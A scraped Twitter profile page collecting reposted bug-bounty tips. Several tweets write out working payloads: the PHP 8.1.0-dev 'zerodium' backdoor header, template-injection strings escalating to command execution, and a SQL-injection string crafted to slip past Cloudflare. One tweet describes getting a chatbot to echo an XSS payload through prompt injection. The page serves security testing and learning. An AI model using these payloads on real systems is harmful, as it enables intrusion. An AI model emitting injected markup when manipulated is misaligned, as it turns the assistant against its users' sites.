Ismail (@ismailpy_crypto) 's Twitter Profile
Ismail

@ismailpy_crypto

ID: 1426689471278460931

calendar_today14-08-2021 23:37:48

269 Tweet

29 Followers

334 Following

VIEH Group (@viehgroup) 's Twitter Profile Photo

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli #cybersecurity

If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id'); 

#bugbounty #bugbountytips #rce #sqli #cybersecurity
NullSecX (@nullsecurityx) 's Twitter Profile Photo

🧠 SSTI → Remote Code Execution 1️⃣ App renders user input in template engine 2️⃣ Attacker sends payload: {{7*7}} 3️⃣ Output: 49 → confirms injection 4️⃣ Escalates to: {{self._globals.os.popen('id').read()}} 🎯 Full RCE via template context #bugbounty #ssti #rce #infosec

🧠 SSTI → Remote Code Execution
1️⃣ App renders user input in template engine
2️⃣ Attacker sends payload: {{7*7}}
3️⃣ Output: 49 → confirms injection
4️⃣ Escalates to: {{self._globals.os.popen('id').read()}}
🎯 Full RCE via template context
#bugbounty #ssti #rce #infosec
Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

BreachForums has possibly returned at their original Onion address with what looks like it's original data. I verified the Canary with the PGP and it is valid. http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion

BreachForums has possibly returned at their original Onion address with what looks like it's original data.

I verified the Canary with the PGP and it is valid.

http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion
InfoSec Community (@infoseccomm) 's Twitter Profile Photo

🚨 New Writeup Alert! 🚨 "I Automated CSP Extraction and Mapped 100+ Subdomains" by Ibtissam hammadi is now live on IW! Check it out here: infosecwriteups.com/adf04880ea5d #cybersecurity #infosec #csp #reconnaissance #bugbounty

Mike Takahashi (@taksec) 's Twitter Profile Photo

XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param

XSS via Prompt Injection 💥🧠🔓
🤖 Find a chatbot
🧠 Ask what model it is
🔁 Get it to repeat text
⚠️ Make it say: '"&gt;&lt;img src=x onerror=alert()&gt;
💥 Escalate to Reflected/Stored XSS via URL param
VIEH Group (@viehgroup) 's Twitter Profile Photo

Insecure Direct Object Reference (IDOR) Checklist credit : sylvain prevost #bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty

Insecure Direct Object Reference (IDOR) Checklist 

credit : <a href="/elsec/">sylvain prevost</a>
#bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty
VIEH Group (@viehgroup) 's Twitter Profile Photo

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

Cloudflare 403 bypass to time-based blind SQLi:
PL: (select(0)from(select(sleep(10)))v) → 403
but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi  
#BugBounty #SQLi
VIEH Group (@viehgroup) 's Twitter Profile Photo

Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ - github.com/MrH0wl/Cloudma… Credit: Md Ismail Šojal 🕷️ #infosec #bugbountytips #Cybersecurity

Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ 
- github.com/MrH0wl/Cloudma… 

Credit: <a href="/0x0SojalSec/">Md Ismail Šojal 🕷️</a> 
#infosec #bugbountytips #Cybersecurity
Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets GitHub: github.com/intigriti/misc…

Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets

GitHub: github.com/intigriti/misc…
Ahmed Abdel Rasoul🐦‍⬛ (@0xbartita) 's Twitter Profile Photo

I just published a new writeup about Authentication Bypass vulnerability on coinmarketcap. 0xbartita.medium.com/how-i-found-an… #bugbountytips #bugbountytip

ProjectDiscovery (@pdiscoveryio) 's Twitter Profile Photo

Define the depth of your crawl with katana's -d flag. The higher the depth, the more recursive crawls and juicy data you get! 🤤 ⚠️ Higher depths can lead to long crawl times against large web applications.

Define the depth of your crawl with katana's -d flag.

The higher the depth, the more recursive crawls and juicy data you get! 🤤

⚠️ Higher depths can lead to long crawl times against large web applications.
Arshiya (@arshiyaiha) 's Twitter Profile Photo

10 common JavaScript coding vulnerabilities Practical code examples.🐞💻 1- Open Redirect 2-SSRF 3-Timing Attacks 4-prototype pollution 5-NoSQLi 6-ReDoS 7-misconfiguration 8-Hard Code Vulnerability 9-mass assignment 10-Host Header Injection #BugBountyTip youtube.com/watch?v=ypNKKY…

Muqsit 𝕏 (@mqst_) 's Twitter Profile Photo

💉 Complete Guide: The SQL Injection Knowledge Base Website: websec.ca/kb/sql_injecti… author: Roberto Salgado #infosec

💉 Complete Guide: The SQL Injection Knowledge Base

Website: websec.ca/kb/sql_injecti…

author: Roberto Salgado

#infosec
Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

Someone make a subdomains database containing 1.6 billion subdomains scrapped from multiple public (and private) sources. This database is now public and FREE and can be queried on the following website. - dash.pugrecon.celes.in #infosec #cybersec #bugbountytips

Someone make a subdomains database containing 1.6 billion subdomains scrapped from multiple public (and private) sources.
 
This database is now public and FREE and can be queried on the following website.

- dash.pugrecon.celes.in

#infosec #cybersec #bugbountytips
𝕏 Bug Bounty Writeups 𝕏 (@bountywriteups) 's Twitter Profile Photo

JShunter JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug

JShunter

JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug
NullSecX (@nullsecurityx) 's Twitter Profile Photo

Unauth RCE in Bricks ≤1.9.6 The /bricks-api/import endpoint allows unauthenticated template imports; attacker-controlled JSON can carry PHP/payloads that the render_element routine processes in an eval‑like manner, resulting in full RCE. #WordPress #RCE #BugBounty

Unauth RCE in Bricks ≤1.9.6

The /bricks-api/import endpoint allows unauthenticated template imports; attacker-controlled JSON can carry PHP/payloads that the render_element routine processes in an eval‑like manner, resulting in full RCE.
 #WordPress #RCE #BugBounty
👑 OFJAAAH 👑 (@ofjaaah) 's Twitter Profile Photo

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

Use NextJS? Recon ✨

A quick way to find "all" paths for Next.js websites:
DevTools-&gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips
VIEH Group (@viehgroup) 's Twitter Profile Photo

🔥SSTI to RCE in URL POC: target.com/docs/1.0/123 = not found target.com/docs/1.0/?123 = now reflecting in source code like /docs/1.0/?123# target.com/docs/1.0/?{{7*7}} = /docs/1.0/?49# ☑️ RCE: /docs/1.0/?{{phpinfo()}} #infosec #bugbounty #bugbountytips

🔥SSTI to RCE in URL

POC: target.com/docs/1.0/123 = not found
target.com/docs/1.0/?123 = now reflecting in source code like /docs/1.0/?123#
target.com/docs/1.0/?{{7*7}} = /docs/1.0/?49#

☑️ RCE: /docs/1.0/?{{phpinfo()}}

#infosec #bugbounty #bugbountytips